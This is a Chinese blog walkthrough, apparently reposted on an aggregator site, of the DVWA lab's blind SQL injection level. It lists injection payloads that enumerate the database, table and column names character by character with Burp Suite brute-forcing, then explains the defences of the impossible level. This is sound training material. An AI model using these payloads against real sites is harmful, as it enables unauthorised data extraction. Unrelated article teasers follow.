dvwa靶场通关(八)

news2025/11/3 0:22:40

第八关:SQL Injection (Blind)

low

这一关是盲注, 所以不能用联合查询了,只能靠一点一点手动盲猜了

 这里用到length和substr函数

先猜数据库名长度

 1' and length(database())=1#

 用bp抓包,发送到爆破

 选择攻击位置

 库名长度应该不会超过五十,所以设置从1到50,增量1

 可以知道,库名长度就是4

知道了长度, 然后就是爆出库名

1' and substr((select database()),1,1)='a'#

 同样的方法爆破库名的第一个字母是d

 直接选择这两个攻击位置会更快,

1' and substr((select database()),$1$,1)='$a$'#

得出库名为dvwa

 接下来猜表名长度

 1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=1#

 得出长度为15,其中包括了逗号,因为group_concat是用逗号把各个表名连接起来的

 接着爆破表名

1' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='a'#

 得出表名有:guestbook,users

 然后是爆出列名

1' and length((select group_concat(column_name) from information_schema.columns where table_name='users'))=1#

1' and substr((select group_concat(column_name) from information_schema.columns where table_name='users'),1,1)='a'#

 medium

下拉表单,选择一个数,用burp suite抓包,

 修改id的参数id=1 and 1=1 存在

 id=1 and 1=2,不存在,说明是数字型

 根据low我们已经知道数据库名叫dvwa了,长度为4,我们验证一下,没错

 

 high

输入1 and 1=1, 存在

 输入1 and 1=2,也存在,说明不是数字型

 输入1' and 1=1#,存在

输入1' and 1=2#,不存在,说明是字符型

 验证数据库名长度为4,与上面的操作相同

 

 

impossible

Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入;

同时只有返回的查询结果数量为1时,才会输出;

利用is_numeric($id)函数来判断输入的id是否是数字or数字字符串,满足条件才知晓query查询语句,

Anti-CSRF token机制的加入了进一步提高了安全性,session_token是随机生成的动态值,每次向服务器请求,客户端都会携带最新从服务端已下发的session_token值向服务器请求作匹配验证,相互匹配才会验证通过

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/740105.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

ModaHub魔搭社区:向量数据库Zilliz Cloud向量搜索和查询教程(二)

ModaHub魔搭社区:向量数据库Zilliz Cloud向量搜索和查询教程(二)

目录 批量搜索 基于条件搜索 查询 批量搜索 Zilliz Cloud 支持在单个请求中同时指定多个查询向量来进行批量搜索。大多数情况下,批量搜索比单向量搜索效率更高,因为批量搜索的总延时会比逐一执行单向量搜索的累计延时要低。 您可以迭代数据集中的行,并以行为单位发送…
阅读更多...
【UGUI学习笔记】Canvas

【UGUI学习笔记】Canvas

文章目录 组件介绍CanvasRender ModeOverlayCameraWorld Space Canvas ScalerReference Pixels Per UnitUI Scale ModeGraphic RaycasterBlocking Object Canvas Grope UGUI2.0官方文档 一些基础对应控件的Attribute的含义: Canvas相当于Android的Panel,…
阅读更多...
二十二、数据运算

二十二、数据运算

目录 一、算术运算 二、比较运算 三、汇总运算 1、count非空值计数 2、sum求和 3、mean求均值 4、max求最大值 5、min求最小值 6、median求中位数 7、mode求众数 8、var求方差 9、std求标准差 10、quantile求分位数 四、相关性运算 一、算术运算 算术运算就是基本…
阅读更多...
Boundless Hackathon @Stanford 主题黑客松活动闭幕,一文回顾

Boundless Hackathon @Stanford 主题黑客松活动闭幕,一文回顾

由 Stanford Blockchain Accelerator、Zebec Protocol、 Nautilus Chain、Rootz Lab 共同主办了“ Boundless Hackathon Stanford ” 主题的黑客松活动在 7 月 1 日正式落下帷幕。 本次黑客松活动旨在帮助更多的优质开发者参与到 Web3 世界的发展中,以推动链上设施的…
阅读更多...
【优选算法题练习】day3

【优选算法题练习】day3

文章目录 一、15. 三数之和1.题目简介2.解题思路3.代码4.运行结果 二、18. 四数之和1.题目简介2.解题思路3.代码4.运行结果 三、209. 长度最小的子数组1.题目简介2.解题思路3.代码4.运行结果 总结 一、15. 三数之和 1.题目简介 15. 三数之和 给你一个整数数组 nums &#xff…
阅读更多...
Python---文件与文件夹操作(你想了解的基本都在这)

Python---文件与文件夹操作(你想了解的基本都在这)

前言: 计算机操作系统是以文件为单位对数据进行管理的。文件是指存储在某种介质上的数据集合。文件在存储介质上的位置是由驱动器名称、文件夹以及文件名来定位的。Python具有强大的文件处理功能,如文件的创建、打开、文件内容的写入、读出文件中的内容…
阅读更多...
初级嵌入式软件工程师养成记(学习路线+学习资源+实战项目汇总)

初级嵌入式软件工程师养成记(学习路线+学习资源+实战项目汇总)

我的圈子: 高级工程师聚集地 我是董哥,高级嵌入式软件开发工程师,从事嵌入式Linux驱动开发和系统开发,曾就职于世界500强企业! 创作理念:专注分享高质量嵌入式文章,让大家读有所得! …
阅读更多...
【Nginx07】Nginx学习:HTTP核心模块(四)错误页面与跳转

【Nginx07】Nginx学习:HTTP核心模块(四)错误页面与跳转

Nginx学习:HTTP核心模块(四)错误页面与跳转 最最核心的部分学习完了,但其实还有更多的内容要等待着我们探索。今天我们先来看到的就是关于错误页面的设置以及 301、302 跳转相关的内容。这两块内容都有一个特点,那就是…
阅读更多...
基于51单片机+SHT30设计的环境温度与湿度检测设备(IIC模拟时序)

基于51单片机+SHT30设计的环境温度与湿度检测设备(IIC模拟时序)

一、项目介绍 当前文章介绍基于51单片机和SHT30传感器设计的环境温度与湿度检测设备。设备采用IIC模拟时序通信协议,能够实时监测环境的温度和湿度,并将数据通过LCD显示屏显示出来;可以广泛应用于室内环境监测、气象观测、农业温室监测等领域…
阅读更多...
路径规划算法:基于白冠鸡优化的路径规划算法- 附代码

路径规划算法:基于白冠鸡优化的路径规划算法- 附代码

路径规划算法:基于白冠鸡优化的路径规划算法- 附代码 文章目录 路径规划算法:基于白冠鸡优化的路径规划算法- 附代码1.算法原理1.1 环境设定1.2 约束条件1.3 适应度函数 2.算法结果3.MATLAB代码4.参考文献 摘要:本文主要介绍利用智能优化算法…
阅读更多...
leetcode 74. 搜索二维矩阵(java)

leetcode 74. 搜索二维矩阵(java)

搜索二维矩阵 leetcode 74. 搜索二维矩阵题目描述抽象BST代码演示 抽象BST leetcode 74. 搜索二维矩阵 来源:力扣(LeetCode) 链接:https://leetcode.cn/problems/search-a-2d-matrix 题目描述 给你一个满足下述两条属性的 m x n 整…
阅读更多...
033、TiDB特性_AUTO_INCREMENT

033、TiDB特性_AUTO_INCREMENT

自增列 实现原理使用限制相关参数示例 实现原理 每一个自增列使用一个全局可见的键值对用于记录当前已分配的最大ID为了降低分布式系统分配自增ID的网络开销,每个TiDB节点会缓存一个不重复的ID段当前预分配的ID段使用完毕,或重启,都会重新再…
阅读更多...
【数据结构导论】第 6 章:查找

【数据结构导论】第 6 章:查找

目录 一、基本概念 二、静态查找表 (1)顺序表上的查找 —— 顺序查找 ① 过程 ② 算法 ③ 算法分析 (2)有序表上的查找 —— 二分查找 ① 二分查找思想 ② 二分查找过程 ③ 二分查找算法 ④ 示例 ⑤ 算法分析 &#…
阅读更多...
CentOS系统内核升级(在线 离线)

CentOS系统内核升级(在线 离线)

centos7.x默认内核版本3.10.x,在安装docker时,部分功能(如 overlay2 存储层驱动)无法使用,并且部分功能可能不太稳定。所以建议大家升级到最新的稳定内核版本。 在线升级 1. 查看当前内核版本 uname -sr Linux 3.10…
阅读更多...
python脚本编译成exe方式进行交付

python脚本编译成exe方式进行交付

Python自动化办公越来越方便,我们经常也会利用python来写一些自动化的小脚本,例如批量处理文档,自动发送邮件等等。 也许是平时吹得牛比较多,有一天秦医生就问起我说能不能给她写一个自动化处理生信数据的小脚本。 这当然是毫无问…
阅读更多...
Stable Diffusion - 扩展插件 (Extensions) 功能的配置与使用

Stable Diffusion - 扩展插件 (Extensions) 功能的配置与使用

欢迎关注我的CSDN:https://spike.blog.csdn.net/ 本文地址:https://spike.blog.csdn.net/article/details/131576762 Prompt: (masterpiece, top quality, best quality, ((standing in centre)), ((1girl, black hair)), ((upper body, symmetrical com…
阅读更多...
视频无损放大修复工具:Topaz Video AI对Mac和Windows的系统要求

视频无损放大修复工具:Topaz Video AI对Mac和Windows的系统要求

Topaz Video AI是一款基于人工智能技术的视频增强软件,旨在提供高质量的视频修复、增强和转换功能。它可以通过智能算法和图像处理技术,改善视频的清晰度、稳定性、降噪效果,还能进行视频转码和格式转换。 Mac:Topaz Video AI fo…
阅读更多...
[pyqt5]designer设计界面设计工具栏上图标和文字同时显示

[pyqt5]designer设计界面设计工具栏上图标和文字同时显示

打开设计师界面 右侧先选择toolBar然后去属性找到toolButtonStyle设置对应选项即可。
阅读更多...
图扑 AR 技术应用与管理:施工建造、机柜扫描、办公室导航解决方案

图扑 AR 技术应用与管理:施工建造、机柜扫描、办公室导航解决方案

随着科技的不断革新和创新,越来越多的行业开始迎来数字化时代的变革。建筑行业作为人类历史上最重要的产业之一,在数字化转型方面同样也在不断推进。图扑软件结合 AR 技术的应用,为建筑行业带来了更加便捷高效的建筑施工过程管理。 传统的建筑…
阅读更多...
MathType7.4中文版下载安装教程

MathType7.4中文版下载安装教程

MathType7.4版是一款功能强大、专业实用、应用范围广的数学公式编辑器软件,这款软件采用了简体中文操作界面并且完美兼容office、wps等一系列常见办公工具,这样就能够很好的为相关用户省去了许多繁琐的操作步骤,用户在这里可以轻轻松松进行公…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023